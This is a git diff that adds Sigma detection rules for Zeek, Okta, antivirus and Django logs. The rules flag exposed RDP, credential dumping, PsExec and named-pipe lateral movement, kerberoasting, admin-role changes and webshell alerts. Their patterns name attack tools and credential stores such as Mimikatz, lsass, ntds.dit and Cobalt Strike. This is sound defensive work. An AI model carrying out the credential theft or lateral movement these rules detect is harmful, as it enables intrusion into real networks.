+ service: rdp +detection: + selection: + id.orig_h|startswith: + - '192.168.' + - '10.' + - '172.16.' + - '172.17.' + - '172.18.' + - '172.19.' + - '172.20.' + - '172.21.' + - '172.22.' + - '172.23.' + - '172.24.' + - '172.25.' + - '172.26.' + - '172.27.' + - '172.28.' + - '172.29.' + - '172.30.' + - '172.31.' + - 'fd' + - '2620:83:800f' + #approved_rdp: + #dst_ip: + #- x.x.x.x + condition: not selection #and not approved_rdp +fields: + - id.orig_h + - id.resp_h +falsepositives: + - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. +level: high diff --git a/bin/main/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml b/bin/main/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml new file mode 100644 index 000000000..e0e7ef851 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml @@ -0,0 +1,27 @@ +title: Remote Task Creation via ATSVC Named Pipe - Zeek +id: dde85b37-40cd-4a94-b00c-0b8794f956b5 +status: test +description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe +author: 'Samir Bousseaden, @neu5rn' +references: + - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml +date: 2020/04/03 +modified: 2021/11/27 +logsource: + product: zeek + service: smb_files +detection: + selection: + path: \\\*\IPC$ + name: atsvc + #Accesses: '*WriteData*' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.lateral_movement + - attack.persistence + - car.2013-05-004 + - car.2015-04-001 + - attack.t1053.002 diff --git a/bin/main/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml b/bin/main/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml new file mode 100644 index 000000000..da432c695 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml @@ -0,0 +1,28 @@ +title: Possible Impacket SecretDump Remote Activity - Zeek +id: 92dae1ed-1c9d-4eff-a567-33acbd95b00e +status: test +description: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml' +author: 'Samir Bousseaden, @neu5ron' +references: + - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html +date: 2020/03/19 +modified: 2021/11/27 +logsource: + product: zeek + service: smb_files +detection: + selection: + path|contains|all: + - '\' + - 'ADMIN$' + name|contains: 'SYSTEM32\' + name|endswith: '.tmp' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.003 diff --git a/bin/main/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml b/bin/main/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml new file mode 100644 index 000000000..68c8c83f0 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml @@ -0,0 +1,42 @@ +title: First Time Seen Remote Named Pipe - Zeek +id: 021310d9-30a6-480a-84b7-eaa69aeb92bb +status: test +description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes +author: 'Samir Bousseaden, @neu5ron' +references: + - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml +date: 2020/04/02 +modified: 2021/11/27 +logsource: + product: zeek + service: smb_files +detection: + selection1: + path: \\\*\IPC$ + selection2: + path: \\\*\IPC$ + name: + - 'atsvc' + - 'samr' + - 'lsarpc' + - 'winreg' + - 'netlogon' + - 'srvsvc' + - 'protected_storage' + - 'wkssvc' + - 'browser' + - 'netdfs' + - 'svcctl' + - 'spoolss' + - 'ntsvcs' + - 'LSM_API_service' + - 'HydraLsPipe' + - 'TermSrv_API_service' + - 'MsFteWds' + condition: selection1 and not selection2 +falsepositives: + - Update the excluded named pipe to filter out any newly observed legit named pipe +level: high +tags: + - attack.lateral_movement + - attack.t1021.002 diff --git a/bin/main/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml b/bin/main/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml new file mode 100644 index 000000000..bfa5b20b1 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml @@ -0,0 +1,33 @@ +title: Suspicious PsExec Execution - Zeek +id: f1b3a22a-45e6-4004-afb5-4291f9c21166 +status: test +description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one +author: 'Samir Bousseaden, @neu5ron' +references: + - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml +date: 2020/04/02 +modified: 2021/11/27 +logsource: + product: zeek + service: smb_files +detection: + selection1: + path|contains|all: + - '\\' + - '\IPC$' + name|endswith: + - '-stdin' + - '-stdout' + - '-stderr' + selection2: + name|contains|all: + - '\\' + - '\IPC$' + path|startswith: 'PSEXESVC' + condition: selection1 and not selection2 +falsepositives: + - Unknown +level: high +tags: + - attack.lateral_movement + - attack.t1021.002 diff --git a/bin/main/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml b/bin/main/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml new file mode 100644 index 000000000..ff4e1bdb2 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml @@ -0,0 +1,39 @@ +title: Suspicious Access to Sensitive File Extensions - Zeek +id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc +status: test +description: Detects known sensitive file extensions via Zeek +author: 'Samir Bousseaden, @neu5ron' +references: + - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml +date: 2020/04/02 +modified: 2021/11/27 +logsource: + product: zeek + service: smb_files +detection: + selection: + name|endswith: + - '.pst' + - '.ost' + - '.msg' + - '.nst' + - '.oab' + - '.edb' + - '.nsf' + - '.bak' + - '.dmp' + - '.kirbi' + - '\groups.xml' + - '.rdp' + condition: selection +fields: + - ComputerName + - SubjectDomainName + - SubjectUserName + - RelativeTargetName +falsepositives: + - Help Desk operator doing backup or re-imaging end user machine or backup software + - Users working with these data types or exchanging message files +level: medium +tags: + - attack.collection diff --git a/bin/main/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml b/bin/main/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml new file mode 100644 index 000000000..ed9fc8db2 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml @@ -0,0 +1,32 @@ +title: Transferring Files with Credential Data via Network Shares - Zeek +id: 2e69f167-47b5-4ae7-a390-47764529eff5 +status: test +description: Transferring files with well-known filenames (sensitive files with credential data) using network shares +author: '@neu5ron, Teymur Kheirkhabarov, oscd.community' +references: + - https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml +date: 2020/04/02 +modified: 2021/11/27 +logsource: + product: zeek + service: smb_files +detection: + selection: + name: + - '\mimidrv' + - '\lsass' + - '\windows\minidump\' + - '\hiberfil' + - '\sqldmpr' + - '\sam' + - '\ntds.dit' + - '\security' + condition: selection +falsepositives: + - Transferring sensitive files for legitimate administration work by legitimate administrator +level: medium +tags: + - attack.credential_access + - attack.t1003.002 + - attack.t1003.001 + - attack.t1003.003 diff --git a/bin/main/rules/network/zeek/zeek_susp_kerberos_rc4.yml b/bin/main/rules/network/zeek/zeek_susp_kerberos_rc4.yml new file mode 100644 index 000000000..d71b2ec56 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_susp_kerberos_rc4.yml @@ -0,0 +1,25 @@ +title: Kerberos Network Traffic RC4 Ticket Encryption +id: 503fe26e-b5f2-4944-a126-eab405cc06e5 +status: test +description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting +author: sigma +references: + - https://adsecurity.org/?p=3458 +date: 2020/02/12 +modified: 2021/11/27 +logsource: + product: zeek + service: kerberos +detection: + selection: + request_type: 'TGS' + cipher: 'rc4-hmac' + computer_acct: + service|startswith: '$' + condition: selection and not computer_acct +falsepositives: + - Normal enterprise SPN requests activity +level: medium +tags: + - attack.credential_access + - attack.t1558.003 diff --git a/bin/main/rules/okta/okta_admin_role_assigned_to_user_or_group.yml b/bin/main/rules/okta/okta_admin_role_assigned_to_user_or_group.yml new file mode 100644 index 000000000..5a0372669 --- /dev/null +++ b/bin/main/rules/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -0,0 +1,26 @@ +title: Okta Admin Role Assigned to an User or Group +id: 413d4a81-6c98-4479-9863-014785fd579c +status: test +description: Detects when an the Administrator role is assigned to an user or group. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098.003 +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - group.privilege.grant + - user.account.privilege.grant + condition: selection +falsepositives: + - Administrator roles could be assigned to users or group by other admin users. + +level: medium diff --git a/bin/main/rules/okta/okta_admin_role_assignment_created.yml b/bin/main/rules/okta/okta_admin_role_assignment_created.yml new file mode 100644 index 000000000..f8fa20391 --- /dev/null +++ b/bin/main/rules/okta/okta_admin_role_assignment_created.yml @@ -0,0 +1,21 @@ +title: Okta Admin Role Assignment Created +id: 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c +status: experimental +description: Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Nikita Khalimonenkov +date: 2023/01/19 +tags: + - attack.persistence +logsource: + product: okta + service: okta +detection: + selection: + eventtype: 'iam.resourceset.bindings.add' + condition: selection +falsepositives: + - Legitimate creation of a new admin role assignment +level: medium diff --git a/bin/main/rules/okta/okta_api_token_created.yml b/bin/main/rules/okta/okta_api_token_created.yml new file mode 100644 index 000000000..b2e259f85 --- /dev/null +++ b/bin/main/rules/okta/okta_api_token_created.yml @@ -0,0 +1,22 @@ +title: Okta API Token Created +id: 19951c21-229d-4ccb-8774-b993c3ff3c5c +status: test +description: Detects when a API token is created +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.persistence +logsource: + product: okta + service: okta +detection: + selection: + eventtype: system.api_token.create + condition: selection +falsepositives: + - Legitimate creation of an API token by authorized users +level: medium diff --git a/bin/main/rules/okta/okta_api_token_revoked.yml b/bin/main/rules/okta/okta_api_token_revoked.yml new file mode 100644 index 000000000..e57121bfa --- /dev/null +++ b/bin/main/rules/okta/okta_api_token_revoked.yml @@ -0,0 +1,23 @@ +title: Okta API Token Revoked +id: cf1dbc6b-6205-41b4-9b88-a83980d2255b +status: test +description: Detects when a API Token is revoked. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + eventtype: system.api_token.revoke + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/okta/okta_application_modified_or_deleted.yml b/bin/main/rules/okta/okta_application_modified_or_deleted.yml new file mode 100644 index 000000000..800cb8698 --- /dev/null +++ b/bin/main/rules/okta/okta_application_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Okta Application Modified or Deleted +id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d +status: test +description: Detects when an application is modified or deleted. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - application.lifecycle.update + - application.lifecycle.delete + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/okta/okta_application_sign_on_policy_modified_or_deleted.yml b/bin/main/rules/okta/okta_application_sign_on_policy_modified_or_deleted.yml new file mode 100644 index 000000000..8d77d6eb5 --- /dev/null +++ b/bin/main/rules/okta/okta_application_sign_on_policy_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Okta Application Sign-On Policy Modified or Deleted +id: 8f668cc4-c18e-45fe-ad00-624a981cf88a +status: test +description: Detects when an application Sign-on Policy is modified or deleted. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - application.policy.sign_on.update + - application.policy.sign_on.rule.delete + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/okta/okta_mfa_reset_or_deactivated.yml b/bin/main/rules/okta/okta_mfa_reset_or_deactivated.yml new file mode 100644 index 000000000..2ffd5a7cf --- /dev/null +++ b/bin/main/rules/okta/okta_mfa_reset_or_deactivated.yml @@ -0,0 +1,27 @@ +title: Okta MFA Reset or Deactivated +id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 +status: test +description: Detects when an attempt at deactivating or resetting MFA. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/21 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.credential_access + - attack.defense_evasion + - attack.t1556.006 +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - user.mfa.factor.deactivate + - user.mfa.factor.reset_all + condition: selection +falsepositives: + - If a MFA reset or deactivated was performed by a system administrator. +level: medium diff --git a/bin/main/rules/okta/okta_network_zone_deactivated_or_deleted.yml b/bin/main/rules/okta/okta_network_zone_deactivated_or_deleted.yml new file mode 100644 index 000000000..5e348ee53 --- /dev/null +++ b/bin/main/rules/okta/okta_network_zone_deactivated_or_deleted.yml @@ -0,0 +1,25 @@ +title: Okta Network Zone Deactivated or Deleted +id: 9f308120-69ed-4506-abde-ac6da81f4310 +status: test +description: Detects when an Network Zone is Deactivated or Deleted. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - zone.deactivate + - zone.delete + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/okta/okta_policy_modified_or_deleted.yml b/bin/main/rules/okta/okta_policy_modified_or_deleted.yml new file mode 100644 index 000000000..547fcadcd --- /dev/null +++ b/bin/main/rules/okta/okta_policy_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Okta Policy Modified or Deleted +id: 1667a172-ed4c-463c-9969-efd92195319a +status: test +description: Detects when an Okta policy is modified or deleted. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - policy.lifecycle.update + - policy.lifecycle.delete + condition: selection +falsepositives: + - Okta Policies being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/bin/main/rules/okta/okta_policy_rule_modified_or_deleted.yml b/bin/main/rules/okta/okta_policy_rule_modified_or_deleted.yml new file mode 100644 index 000000000..958e131d3 --- /dev/null +++ b/bin/main/rules/okta/okta_policy_rule_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Okta Policy Rule Modified or Deleted +id: 0c97c1d3-4057-45c9-b148-1de94b631931 +status: test +description: Detects when an Policy Rule is Modified or Deleted. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - policy.rule.update + - policy.rule.delete + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/okta/okta_security_threat_detected.yml b/bin/main/rules/okta/okta_security_threat_detected.yml new file mode 100644 index 000000000..0cffb48f9 --- /dev/null +++ b/bin/main/rules/okta/okta_security_threat_detected.yml @@ -0,0 +1,21 @@ +title: Okta Security Threat Detected +id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 +status: test +description: Detects when an security threat is detected in Okta. +references: + - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +logsource: + product: okta + service: okta +detection: + selection: + eventtype: security.threat.detected + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/okta/okta_unauthorized_access_to_app.yml b/bin/main/rules/okta/okta_unauthorized_access_to_app.yml new file mode 100644 index 000000000..0206a7b96 --- /dev/null +++ b/bin/main/rules/okta/okta_unauthorized_access_to_app.yml @@ -0,0 +1,22 @@ +title: Okta Unauthorized Access to App +id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 +status: test +description: Detects when unauthorized access to app occurs. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: okta + service: okta +detection: + selection: + displaymessage: User attempted unauthorized access to app + condition: selection +falsepositives: + - User might of believe that they had access. +level: medium diff --git a/bin/main/rules/okta/okta_user_account_locked_out.yml b/bin/main/rules/okta/okta_user_account_locked_out.yml new file mode 100644 index 000000000..6a55d16e3 --- /dev/null +++ b/bin/main/rules/okta/okta_user_account_locked_out.yml @@ -0,0 +1,23 @@ +title: Okta User Account Locked Out +id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a +status: test +description: Detects when an user account is locked out. +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +author: Austin Songer @austinsonger +date: 2021/09/12 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1531 +logsource: + product: okta + service: okta +detection: + selection: + displaymessage: Max sign in attempts exceeded + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/others_application/antivirus/av_exploiting.yml b/bin/main/rules/others_application/antivirus/av_exploiting.yml new file mode 100644 index 000000000..c59de7e70 --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_exploiting.yml @@ -0,0 +1,41 @@ +title: Antivirus Exploitation Framework Detection +id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864 +status: test +description: Detects a highly relevant Antivirus alert that reports an exploitation framework +author: Florian Roth +references: + - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/ +date: 2018/09/09 +modified: 2022/05/12 +logsource: + category: antivirus +detection: + selection: + Signature|contains: + - 'MeteTool' + - 'MPreter' + - 'Meterpreter' + - 'Metasploit' + - 'PowerSploit' + - 'CobaltStrike' + - 'Swrort' + - 'Rozena' + - 'Backdoor.Cobalt' + - 'CobaltStr' + - 'COBEACON' + - 'Cometer' + - 'Razy' + - 'IISExchgSpawnCMD' + - 'Exploit.Script.CVE' + condition: selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: critical +tags: + - attack.execution + - attack.t1203 + - attack.command_and_control + - attack.t1219 diff --git a/bin/main/rules/others_application/antivirus/av_hacktool.yml b/bin/main/rules/others_application/antivirus/av_hacktool.yml new file mode 100644 index 000000000..7b7f9a977 --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_hacktool.yml @@ -0,0 +1,29 @@ +title: Antivirus Hacktool Detection +id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba +description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool +status: experimental +date: 2021/08/16 +author: Florian Roth +references: + - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ +logsource: + category: antivirus +detection: + selection: + - Signature|startswith: + - 'HTOOL' + - 'HKTL' + - 'SecurityTool' + - 'ATK/' # Sophos + - Signature|contains: + - 'Hacktool' + condition: selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: high +tags: + - attack.execution + - attack.t1204 diff --git a/bin/main/rules/others_application/antivirus/av_password_dumper.yml b/bin/main/rules/others_application/antivirus/av_password_dumper.yml new file mode 100644 index 000000000..a8731c654 --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_password_dumper.yml @@ -0,0 +1,41 @@ +title: Antivirus Password Dumper Detection +id: 78cc2dd2-7d20-4d32-93ff-057084c38b93 +status: test +description: Detects a highly relevant Antivirus alert that reports a password dumper +author: Florian Roth +references: + - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/ + - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection +date: 2018/09/09 +modified: 2022/05/12 +logsource: + category: antivirus +detection: + selection: + Signature|contains: + - 'DumpCreds' + - 'Mimikatz' + - 'PWCrack' + - 'HTool/WCE' + - 'PSWTool' + - 'PWDump' + - 'SecurityTool' + - 'PShlSpy' + - 'Rubeus' + - 'Kekeo' + - 'LsassDump' + - 'Outflank' + - 'DumpLsass' + condition: selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: critical +tags: + - attack.credential_access + - attack.t1003 + - attack.t1558 + - attack.t1003.001 + - attack.t1003.002 diff --git a/bin/main/rules/others_application/antivirus/av_printernightmare_cve_2021_34527.yml b/bin/main/rules/others_application/antivirus/av_printernightmare_cve_2021_34527.yml new file mode 100644 index 000000000..bca051814 --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_printernightmare_cve_2021_34527.yml @@ -0,0 +1,29 @@ +title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection +id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561 +status: stable +description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . +references: + - https://twitter.com/mvelazco/status/1410291741241102338 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 +author: Sittikorn S, Nuttakorn T, Tim Shelton +date: 2021/07/01 +modified: 2022/03/22 +tags: + - attack.privilege_escalation + - attack.t1055 +logsource: + category: antivirus +detection: + selection: + Filename|contains: 'C:\Windows\System32\spool\drivers\x64\' + keywords: + - 'File submitted to Symantec' # symantec fp, pending analysis, more generic + condition: selection and not keywords +fields: + - Signature + - Filename + - ComputerName +falsepositives: + - Unlikely, or pending PSP analysis +level: critical diff --git a/bin/main/rules/others_application/antivirus/av_ransomware.yml b/bin/main/rules/others_application/antivirus/av_ransomware.yml new file mode 100644 index 000000000..d58b66cfa --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_ransomware.yml @@ -0,0 +1,21 @@ +title: Antivirus Ransomware Detection +id: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f +status: experimental +description: Detects a highly relevant Antivirus alert that reports ransomware +author: Florian Roth +references: + - https://www.nextron-systems.com/?s=antivirus +date: 2022/05/12 +logsource: + category: antivirus +detection: + selection: + Signature|contains: + - 'Ransom' + - 'Filecoder' + condition: selection +falsepositives: + - Unlikely +level: critical +tags: + - attack.t1486 diff --git a/bin/main/rules/others_application/antivirus/av_relevant_files.yml b/bin/main/rules/others_application/antivirus/av_relevant_files.yml new file mode 100644 index 000000000..fc2377166 --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_relevant_files.yml @@ -0,0 +1,78 @@ +title: Antivirus Relevant File Paths Alerts +id: c9a88268-0047-4824-ba6e-4d81ce0b907c +description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name +status: experimental +date: 2018/09/09 +modified: 2021/11/23 +author: Florian Roth, Arnim Rupp +references: + - https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/ +logsource: + category: antivirus +detection: + selection: + - Filename|startswith: + - 'C:\Windows\' + - 'C:\Temp\' + - 'C:\PerfLogs\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - Filename|contains: + - '\Client\' + - '\tsclient\' + - '\inetpub\' + - '/www/' + - 'apache' + - 'tomcat' + - 'nginx' + - 'weblogic' + selection2: + Filename|endswith: + - '.asax' + - '.ashx' + - '.asmx' + - '.asp' + - '.aspx' + - '.bat' + - '.cfm' + - '.cgi' + - '.chm' + - '.cmd' + - '.dat' + - '.ear' + - '.gif' + - '.hta' + - '.jpeg' + - '.jpg' + - '.jsp' + - '.jspx' + - '.lnk' + - '.php' + - '.pl' + - '.png' + - '.ps1' + - '.psm1' + - '.py' + - '.pyc' + - '.rb' + - '.scf' + - '.sct' + - '.sh' + - '.svg' + - '.txt' + - '.vbe' + - '.vbs' + - '.war' + - '.wsf' + - '.wsh' + - '.xml' + condition: selection or selection2 +fields: + - Signature + - User +falsepositives: + - Unlikely +level: high +tags: + - attack.resource_development + - attack.t1588 diff --git a/bin/main/rules/others_application/antivirus/av_webshell.yml b/bin/main/rules/others_application/antivirus/av_webshell.yml new file mode 100644 index 000000000..d8f2f4465 --- /dev/null +++ b/bin/main/rules/others_application/antivirus/av_webshell.yml @@ -0,0 +1,75 @@ +title: Antivirus Web Shell Detection +id: fdf135a2-9241-4f96-a114-bb404948f736 +description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches. +status: experimental +date: 2018/09/09 +modified: 2022/05/12 +author: Florian Roth, Arnim Rupp +references: + - https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/ + - https://github.com/tennc/webshell + - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection + - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection + - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection + - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection + - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection + - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection + - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection +tags: + - attack.persistence + - attack.t1505.003 +logsource: + category: antivirus +detection: + selection: + - Signature|startswith: + - 'PHP/' + - 'JSP/' + - 'ASP/' + - 'Perl/' + - 'PHP.' + - 'JSP.' + - 'ASP.' + - 'Perl.' + - 'VBS/Uxor' # looking for 'VBS/' would also find downloaders and droppers meant for desktops + - 'IIS/BackDoor' + - 'JAVA/Backdoor' + - 'Troj/ASP' + - 'Troj/PHP' + - 'Troj/JSP' + - Signature|contains: + - 'Webshell' + - 'Chopper' + - 'SinoChoper' + - 'ASPXSpy' + - 'Aspdoor' + - 'filebrowser' + - 'PHP_' + - 'JSP_' + - 'ASP_' # looking for 'VBS_' would also find downloaders and droppers meant for desktops + - 'PHP:' + - 'JSP:' + - 'ASP:' + - 'Perl:' + - 'PHPShell' + - 'Trojan.PHP' + - 'Trojan.ASP' + - 'Trojan.JSP' + - 'Trojan.VBS' + - 'PHP?Agent' + - 'ASP?Agent' + - 'JSP?Agent' + - 'VBS?Agent' + - 'Backdoor?PHP' + - 'Backdoor?JSP' + - 'Backdoor?ASP' + - 'Backdoor?VBS' + - 'Backdoor?Java' + - 'PShlSpy' + condition: selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: high diff --git a/bin/main/rules/others_application/django/appframework_django_exceptions.yml b/bin/main/rules/others_application/django/appframework_django_exceptions.yml new file mode 100644 index 000000000..a2646738a --- /dev/null +++ b/bin/main/rules/others_application/django/appframework_django_exceptions.yml @@ -0,0 +1,36 @@ +title: Django Framework Exceptions +id: fd435618-981e-4a7c-81f8-f78ce480d616 +status: stable +description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts +author: Thomas Patzke +date: 2017/08/05 +modified: 2020/09/01 +references: + - https://docs.djangoproject.com/en/1.11/ref/exceptions/ + - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security +logsource: + category: application + product: django +detection: + keywords: + - SuspiciousOperation + # Subclasses of SuspiciousOperation + - DisallowedHost + - DisallowedModelAdminLookup + - DisallowedModelAdminToField + - DisallowedRedirect + - InvalidSessionKey + - RequestDataTooBig + - SuspiciousFileOperation + - SuspiciousMultipartForm + - SuspiciousSession + - TooManyFieldsSent + # Further security-related exceptions + 